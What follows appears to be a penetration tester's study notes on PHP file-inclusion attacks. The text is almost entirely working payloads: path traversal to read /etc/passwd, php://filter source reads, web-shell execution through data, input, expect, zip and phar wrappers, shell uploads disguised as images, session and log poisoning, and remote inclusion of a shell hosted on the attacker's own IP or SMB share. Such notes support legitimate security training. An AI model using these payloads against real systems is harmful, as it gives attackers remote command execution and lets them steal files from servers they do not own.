File Inclusion

LFI

../../etc/passwd
urlencode^
null byte
- ../../etc/passwd%00
bypass replace filter
- ....//....//....//....//etc/passwd
reading source through lfi
- fuzz for potential php files
- use php filters as lfi
  - php://filter/read=convert.base64-encode/resource=[file]
  - retrieve base64 encoded string then decode in console or to file
    echo '[b46string]' | base64 -d > output.php
checking for allow_url_include
- use LFI and php filters to read the php ini file
- apache
  - curl "http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"
- nginx
  - curl "http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/fpm/php.ini"
- grep the output for allow_url_include
php wrappers
- data
  - data://text/plain;base64,
  - needs allow_url_include
  - generate b64 php shell
    echo '<?php system($_GET["cmd"]); ?>' | base64
  - url encode b64 string
  - use data wrapper
    curl -s 'http://<SERVER_IP>:<PORT>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id'
- input
  - php://input
  - needs allow_url_include
  - must accept post data
  - send shell as post data
  - curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"
- expect
  - expect://
  - relies on expect extension
    grep for it line we did for allow_url_include
  - curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
- zip
  - zip://
  - craft a shell (in this example, creating a zip named jpg for image upload)
  - echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
  - execute
    http://<SERVER_IP>:<PORT>/index.php?language=zip://./profile_images/shell.jpg%23shell.php&cmd=id
- phar
  - compile shell.php

<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');

$phar->stopBuffering();

	-compile phar
		- `php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg`
	- execute
		- `http://<SERVER_IP>:<PORT>/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id`

File Upload
- create malicious image
  - echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
- upload
- get path
- execute
  - http://<SERVER_IP>:<PORT>/index.php?language=./profile_images/shell.gif&cmd=id

RFI

requires allow_url_include
test with local url
- http://<SERVER_IP>:<PORT>/index.php?language=http://127.0.0.1:80/index.php
host a shell
- http://<SERVER_IP>:<PORT>/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id
can be hosted with ftp if http is blocked
if host is windows, we can use smb
- set up share on your machine with shell
  - impacket-smbserver -smb2support share $(pwd)
- http://<SERVER_IP>:<PORT>/index.php?language=\\<OUR_IP>\shell.php&cmd=whoami

PHP Session Poisoning

locations
- linux
  - /var/lib/php/sessions/
- windows
  - C:\Windows\Temp\
- filename is sesh_+cookie value
- set variable we control with LFI
  - url encoded web shell
    %3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
- use lfi to read session data
  - http://<SERVER_IP>:<PORT>/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id
- must be re-poisoned with web shell after each execution

Server Log Poisoning

apache
- linux
  - /var/log/apache2/
- windows
  - C:\xampp\apache\logs\
nginx
- linux
  - /var/log/nginx/
- windows
  - C:\nginx\log\
use burp to modify User-Agent header
- User-Agent: <?php system($_GET['cmd']); ?>
can also change header through curl
- curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>'
use lfi to include the access log and append a cmd GET param
many other logs are affected as well
- ssh
- ftp
- mail

PreviousTools NextPrivilege Escalation

Last updated 2 months ago